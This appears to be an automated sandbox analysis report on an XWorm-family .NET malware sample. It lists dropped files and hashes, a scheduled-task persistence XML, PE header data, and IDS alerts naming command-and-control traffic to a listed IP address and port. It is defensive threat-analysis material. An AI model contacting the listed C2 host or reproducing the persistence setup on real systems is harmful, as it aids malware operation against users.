                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                  Process:C:\Users\user\AppData\Roaming\pNYyTm.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1216
                  Entropy (8bit):5.34331486778365
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                  Malicious:false
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):2232
                  Entropy (8bit):5.380503343696294
                  Encrypted:false
                  SSDEEP:48:+WSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//ZPUyuVws:+LHxv2IfLZ2KRH6OugbVws
                  MD5:AF312E4EAC25BAFDDD181B92D4F5B3DA
                  SHA1:DF4E08CFA2625E73110D803B7EDDC79B8BEA98DD
                  SHA-256:CC510A10DDEACAE270B798810DC5E633F25875D5342485C0EBCDFE9924EC7FBC
                  SHA-512:C65FD4F2A4B3196EFCC411776484FFB086D739F5659C2D3424C5FF2AA3C45C21F6B4D0FB0F321751429C2FE46FFA78624BB8507BDDE71F4058061096A149D51E
                  Malicious:false
                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):29
                  Entropy (8bit):3.598349098128234
                  Encrypted:false
                  SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                  MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                  SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                  SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                  SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
                  Malicious:false
                  Preview:....### explorer ###..[WIN]r
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                  File Type:XML 1.0 document, ASCII text
                  Category:dropped
                  Size (bytes):1565
                  Entropy (8bit):5.1084988869365135
                  Encrypted:false
                  SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTSvv:He7XQBBYrFdOFzOz6dKrsuS
                  MD5:E1E0B285468CFAB419CB9C339A3E52C0
                  SHA1:75F9AEA47F889943EAFE8853B5D8B6B6BA9B6E2F
                  SHA-256:F29908DDDF5FF4C5F54007F4F995CF45DE19E5DD3EC9DD34F74FCE17530CF0F4
                  SHA-512:C22A61F633677CE19836759BCCED0477D9D3820B053B87C214AC5750D5484FD93305979FDD6AF8A5EA3F8C30A09E3A4B75A4C28DE6E76595CC89FF0B429BF892
                  Malicious:true
                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                  Process:C:\Users\user\AppData\Roaming\pNYyTm.exe
                  File Type:XML 1.0 document, ASCII text
                  Category:dropped
                  Size (bytes):1565
                  Entropy (8bit):5.1084988869365135
                  Encrypted:false
                  SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTSvv:He7XQBBYrFdOFzOz6dKrsuS
                  MD5:E1E0B285468CFAB419CB9C339A3E52C0
                  SHA1:75F9AEA47F889943EAFE8853B5D8B6B6BA9B6E2F
                  SHA-256:F29908DDDF5FF4C5F54007F4F995CF45DE19E5DD3EC9DD34F74FCE17530CF0F4
                  SHA-512:C22A61F633677CE19836759BCCED0477D9D3820B053B87C214AC5750D5484FD93305979FDD6AF8A5EA3F8C30A09E3A4B75A4C28DE6E76595CC89FF0B429BF892
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jul 18 05:35:14 2024, mtime=Thu Jul 18 05:35:14 2024, atime=Thu Jul 18 05:35:14 2024, length=479744, window=hide
                  Category:dropped
                  Size (bytes):763
                  Entropy (8bit):5.084402366748371
                  Encrypted:false
                  SSDEEP:12:87hy124c0YCh0lZY//C1WeLAHdjAHANHk4bdmV:87hypcRZSKz8ZAHD4xm
                  MD5:A7B9FF1C13BD9F8B734CD3CDB141C43F
                  SHA1:60C2534A0628503493D1780308B349766970367D
                  SHA-256:9BC10E26800E0632E39E2D255327B4352CCC462E2176757133AD0F38E4E07D4C
                  SHA-512:6D58DF49997055409D23AE6E4638328F285A3EAC7423C467AE3279FDD71A75F33D34EA91F3780448D9D874F36BD3FFEA55C80283E88113CB5B6110BDEDB3A024
                  Malicious:false
                  Preview:L..................F.... .........................R......................v.:..DG..Yr?.D..U..k0.&...&.........5q....wP.....M..........t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Xa4...........................c..A.p.p.D.a.t.a...B.V.1......Xe4..Roaming.@......EW)N.Xe4..........................B...R.o.a.m.i.n.g.....b.2..R...Xh4 .XClient.exe.H.......Xh4.Xh4....l.....................HZ..X.C.l.i.e.n.t...e.x.e.......X...............-.......W...........R..P.....C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......536720...........hT..CrF.f4... .y!..jc...+...E...hT..CrF.f4... .y!..jc...+...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):479744
                  Entropy (8bit):7.957169115629821
                  Encrypted:false
                  SSDEEP:12288:DiuaKWgPg8r0wTKu6TlzRuCvPeIXSeXq:2ngo8r0mecKFX
                  MD5:7FDA9F799B84A7ED802F7127869D5E81
                  SHA1:55137AA833EE1653F52378599AAD376073264499
                  SHA-256:96C861FCA93E9209ACB17B95B4253F3C26F483AD7DD9EEBE15DA3067299EF1AC
                  SHA-512:E8A8CEC97A5D73A125CC6C2B05266B28CD339CE81DF5C43B3990D70D4C86A281D97A5E1CD09B14D8C7594B32E5559CE32ED5EBE69E31F87E24B2FCD27EABD089
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 34%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]..f..............0.."..........j@... ...`....@.. ....................................@..................................@..O....`...*........................................................................... ............... ..H............text...p ... ...".................. ..`.rsrc....*...`...,...$..............@..@.reloc...............P..............@..B................L@......H.......HT..H)......8....}..............................................&.(......*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0...........r...p.+..*:..o....(....&*...0............{.....+..*&...}....*...0..8........r...p.(.......(....r!..p.o.......r3..p(....(....(....&*..(........}......}......}.......}....*B.(........}....*.0............{.....+..*&...}....*...0...........r7..p.+..*Z......(.........}....*^..}..
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):479744
                  Entropy (8bit):7.957169115629821
                  Encrypted:false
                  SSDEEP:12288:DiuaKWgPg8r0wTKu6TlzRuCvPeIXSeXq:2ngo8r0mecKFX
                  MD5:7FDA9F799B84A7ED802F7127869D5E81
                  SHA1:55137AA833EE1653F52378599AAD376073264499
                  SHA-256:96C861FCA93E9209ACB17B95B4253F3C26F483AD7DD9EEBE15DA3067299EF1AC
                  SHA-512:E8A8CEC97A5D73A125CC6C2B05266B28CD339CE81DF5C43B3990D70D4C86A281D97A5E1CD09B14D8C7594B32E5559CE32ED5EBE69E31F87E24B2FCD27EABD089
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 34%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]..f..............0.."..........j@... ...`....@.. ....................................@..................................@..O....`...*........................................................................... ............... ..H............text...p ... ...".................. ..`.rsrc....*...`...,...$..............@..@.reloc...............P..............@..B................L@......H.......HT..H)......8....}..............................................&.(......*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0............{.....+..*&...}....*...0...........r...p.+..*:..o....(....&*...0............{.....+..*&...}....*...0..8........r...p.(.......(....r!..p.o.......r3..p(....(....(....&*..(........}......}......}.......}....*B.(........}....*.0............{.....+..*&...}....*...0...........r7..p.+..*Z......(.........}....*^..}..
                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Preview:[ZoneTransfer]....ZoneId=0
                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.957169115629821
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  File name:SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
                  File size:479'744 bytes
                  MD5:7fda9f799b84a7ed802f7127869d5e81
                  SHA1:55137aa833ee1653f52378599aad376073264499
                  SHA256:96c861fca93e9209acb17b95b4253f3c26f483ad7dd9eebe15da3067299ef1ac
                  SHA512:e8a8cec97a5d73a125cc6c2b05266b28cd339ce81df5c43b3990d70d4c86a281d97a5e1cd09b14d8c7594b32e5559ce32ed5ebe69e31f87e24b2fcd27eabd089
                  SSDEEP:12288:DiuaKWgPg8r0wTKu6TlzRuCvPeIXSeXq:2ngo8r0mecKFX
                  TLSH:A7A423737B6C6B65C8B9E3F320151765A3F131A76881F8141FEDA0C4AB37B0212D6A97
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]..f..............0.."..........j@... ...`....@.. ....................................@................................
                  Icon Hash:1f73ad0b8bad6d13
                  Entrypoint:0x47406a
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6698985D [Thu Jul 18 04:21:49 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x740180x4f.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x760000x2a84.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x720700x7220096d1a2beaeb57a155dd514ca1eaba115False0.9362656592278203data7.966741357307765IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rsrc0x760000x2a840x2c00c711c7d920052d9718f80b5479906679False0.9177024147727273data7.5996906953881656IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x7a0000xc0x200a47ec48214838d21c5d6dc5f9d06302bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0x760c80x26b6PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9978809283551968
                  RT_GROUP_ICON0x787900x14data1.05
                  RT_VERSION0x787b40x2ccdata0.4273743016759777
                  DLLImport
                  mscoree.dll_CorExeMain
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  07/18/24-08:39:03.973866TCP2852874ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M23060849708193.161.193.99192.168.2.10
                  07/18/24-08:39:13.060374TCP2852870ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes3060849708193.161.193.99192.168.2.10
                  07/18/24-08:35:28.425606TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound4970830608192.168.2.10193.161.193.99
                  07/18/24-08:39:13.061283TCP2852923ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970830608192.168.2.10193.161.193.99
                  07/18/24-08:36:45.798419TCP2853193ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound4970830608192.168.2.10193.161.193.99
                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                  2024-07-18T08:35:28.425606+0200TCP2855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound4970830608192.168.2.10193.161.193.99
                  2024-07-18T08:39:13.060374+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes3060849708193.161.193.99192.168.2.10
                  2024-07-18T08:39:13.061283+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)4970830608192.168.2.10193.161.193.99
                  2024-07-18T08:39:03.973866+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M23060849708193.161.193.99192.168.2.10
